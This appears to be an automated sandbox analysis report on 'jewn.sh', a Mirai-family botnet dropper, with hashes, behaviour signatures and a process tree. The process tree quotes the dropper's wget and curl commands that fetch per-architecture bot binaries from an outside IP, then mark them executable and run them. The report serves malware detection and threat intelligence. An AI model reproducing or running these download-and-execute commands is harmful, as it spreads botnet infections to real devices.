Analysis
-
max time kernel
150s -
max time network
148s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
06/12/2024, 13:19
Static task
static1
Behavioral task
behavioral1
Sample
jewn.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
jewn.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
jewn.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
jewn.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
jewn.sh
-
Size
1KB
-
MD5
49377a7c5220a2e428c4ff6898fcd50c
-
SHA1
0d2843613a97cc150c539474b2db2ff741260997
-
SHA256
336fc216d10d88ac069d22db53159229050040ff570e610ddcca11040e666a4c
-
SHA512
51189375074dc361c0b855ae89774e7888a0a3360bd8291f2d99ba2bc8de4cdf8a2307044d8aee9d9459973f2e29b5d866b7b004e7df754688324a207d77b342
Malware Config
Extracted
mirai
KURC
Extracted
mirai
KURC
Signatures
-
Mirai family
-
Contacts a large (112273) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 9 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 744 chmod 760 chmod 844 chmod 865 chmod 874 chmod 751 chmod 856 chmod 883 chmod 892 chmod -
Executes dropped EXE 9 IoCs
ioc pid Process /tmp/jewn 745 jewn /tmp/jewn 752 jewn /tmp/jewn 761 jewn /tmp/jewn 845 jewn /tmp/jewn 857 jewn /tmp/jewn 866 jewn /tmp/jewn 875 jewn /tmp/jewn 884 jewn /tmp/jewn 893 jewn -
Modifies Watchdog functionality 1 TTPs 16 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/misc/watchdog jewn -
Enumerates active TCP sockets 1 TTPs 7 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn -
Writes file to system bin folder 16 IoCs
description ioc Process File opened for modification /bin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /bin/watchdog jewn -
Changes its process name 8 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself lwBCgghFzfDnDrmF 752 jewn Changes the process name, possibly in an attempt to hide itself rBAbBwzcphrnizvF$) 761 jewn Changes the process name, possibly in an attempt to hide itself CnnDkyrsjvEx'/ 845 jewn Changes the process name, possibly in an attempt to hide itself gmwsyagr 1 857 jewn Changes the process name, possibly in an attempt to hide itself nwFcBpxaEECd. 866 jewn Changes the process name, possibly in an attempt to hide itself nEladpcdkDqDxsBj:< 875 jewn Changes the process name, possibly in an attempt to hide itself jrnvrCyaCEbcmqif 884 jewn Changes the process name, possibly in an attempt to hide itself xeoqpFnp92( 893 jewn -
Reads system network configuration 1 TTPs 7 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn -
description ioc Process File opened for reading /proc/356/fd jewn File opened for reading /proc/715/fd jewn File opened for reading /proc/721/fd jewn File opened for reading /proc/675/fd jewn File opened for reading /proc/679/fd jewn File opened for reading /proc/357/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/240/fd jewn File opened for reading /proc/354/fd jewn File opened for reading /proc/386/fd jewn File opened for reading /proc/380/fd jewn File opened for reading /proc/859/fd jewn File opened for reading /proc/862/fd jewn File opened for reading /proc/353/fd jewn File opened for reading /proc/354/fd jewn File opened for reading /proc/380/fd jewn File opened for reading /proc/155/fd jewn File opened for reading /proc/850/fd jewn File opened for reading /proc/678/fd jewn File opened for reading /proc/678/fd jewn File opened for reading /proc/176/fd jewn File opened for reading /proc/673/fd jewn File opened for reading /proc/675/fd jewn File opened for reading /proc/721/fd jewn File opened for reading /proc/327/fd jewn File opened for reading /proc/379/fd jewn File opened for reading /proc/353/fd jewn File opened for reading /proc/693/fd jewn File opened for reading /proc/354/fd jewn File opened for reading /proc/386/fd jewn File opened for reading /proc/719/fd jewn File opened for reading /proc/354/fd jewn File opened for reading /proc/357/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/379/fd jewn File opened for reading /proc/176/fd jewn File opened for reading /proc/679/fd jewn File opened for reading /proc/240/fd jewn File opened for reading /proc/176/fd jewn File opened for reading /proc/240/fd jewn File opened for reading /proc/840/fd jewn File opened for reading /proc/379/fd jewn File opened for reading /proc/357/fd jewn File opened for reading /proc/715/fd jewn File opened for reading /proc/871/fd jewn File opened for reading /proc/353/fd jewn File opened for reading /proc/675/fd jewn File opened for reading /proc/754/fd jewn File opened for reading /proc/707/fd jewn File opened for reading /proc/715/fd jewn File opened for reading /proc/327/fd jewn File opened for reading /proc/673/fd jewn File opened for reading /proc/380/fd jewn File opened for reading /proc/721/fd jewn File opened for reading /proc/353/fd jewn File opened for reading /proc/715/fd jewn File opened for reading /proc/886/fd jewn File opened for reading /proc/715/fd jewn File opened for reading /proc/327/fd jewn File opened for reading /proc/715/fd jewn File opened for reading /proc/1/fd jewn File opened for reading /proc/434/fd jewn File opened for reading /proc/356/fd jewn File opened for reading /proc/721/fd jewn -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 747 wget 749 curl 750 cat -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jew.arm5 wget File opened for modification /tmp/jew.arm6 wget File opened for modification /tmp/jew.ppc curl File opened for modification /tmp/jew.m68k wget File opened for modification /tmp/jew.mips wget File opened for modification /tmp/jew.arm6 curl File opened for modification /tmp/jew.arm7 wget File opened for modification /tmp/jew.arm7 curl File opened for modification /tmp/jew.sh4 wget File opened for modification /tmp/jew.x86 wget File opened for modification /tmp/jew.x86 curl File opened for modification /tmp/jew.mpsl wget File opened for modification /tmp/jew.mpsl curl File opened for modification /tmp/jew.sh4 curl File opened for modification /tmp/jewn jewn.sh File opened for modification /tmp/jew.mips curl File opened for modification /tmp/jew.arm4 curl File opened for modification /tmp/jew.arm5 curl File opened for modification /tmp/jew.ppc wget File opened for modification /tmp/jew.m68k curl
Processes
-
/tmp/jewn.sh/tmp/jewn.sh1⤵
- Writes file to tmp directory
PID:715 -
/usr/bin/wgetwget http://93.123.85.78/bins/jew.x862⤵
- Writes file to tmp directory
PID:718
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/catcat jew.x862⤵PID:743
-
-
/bin/chmodchmod +x jewn jewn.sh jew.x86 systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-9R0n4H2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:745
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:749
-
-
/bin/catcat jew.mips2⤵
- System Network Configuration Discovery
PID:750
-
-
/bin/chmodchmod +x jew.mips jewn jewn.sh jew.x86 systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-9R0n4H2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:752
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.mpsl2⤵
- Writes file to tmp directory
PID:757
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.mpsl2⤵
- Writes file to tmp directory
PID:758
-
-
/bin/chmodchmod +x jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-9R0n4H2⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:761
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.arm42⤵PID:841
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.arm42⤵
- Writes file to tmp directory
PID:842
-
-
/bin/chmodchmod +x jew.arm4 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-9R0n4H2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:845
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.arm52⤵
- Writes file to tmp directory
PID:851
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.mips jew.mpsl jewn jewn.sh jew.x862⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:857
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.arm62⤵
- Writes file to tmp directory
PID:860
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.arm62⤵
- Writes file to tmp directory
PID:863
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.mips jew.mpsl jewn jewn.sh jew.x862⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:866
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.arm72⤵
- Writes file to tmp directory
PID:869
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.arm72⤵
- Writes file to tmp directory
PID:872
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.x862⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:875
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.ppc2⤵
- Writes file to tmp directory
PID:878
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.ppc2⤵
- Writes file to tmp directory
PID:881
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x862⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:884
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.m68k2⤵
- Writes file to tmp directory
PID:887
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.m68k2⤵
- Writes file to tmp directory
PID:890
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x862⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:893
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.sh42⤵
- Writes file to tmp directory
PID:896
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.sh42⤵
- Writes file to tmp directory
PID:899
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD5ec9bf54e29277d9028ea800cf3cf7501
SHA1371485bf2f9f86e25e618fcb98071b3f6c8524a8
SHA25619385e38460e0a288e81bdcbb75e7ad23f747d5163ba276ec996bc53db3a11d2
SHA51287e2fd37cead67b3e43a9b18c0c43b702ba6ecee6d1de3be60d7bf778218c872b417a693205172a2c4ad368c9ffdfe5f7dcd6ff6a0868ad946dbe5cc9e727da9
-
Filesize
125KB
MD5c5ac3c0d137d7a994fb24f0d05335848
SHA11aca371b36bf8170bdc06e7014a5aef1c89ac0d9
SHA256bd1585f0afe62dc9966151ce8f722958b21846e3a164dad19cf266a14bb5075d
SHA5122dd5eedb9f9e1967db8a8025435f4bd9781592342e27ee66dd64c3ed63ec688b83adaff3995cece7f59c7acb68d93bcd2fbbdce35b94e318b9a955cb0dd64c80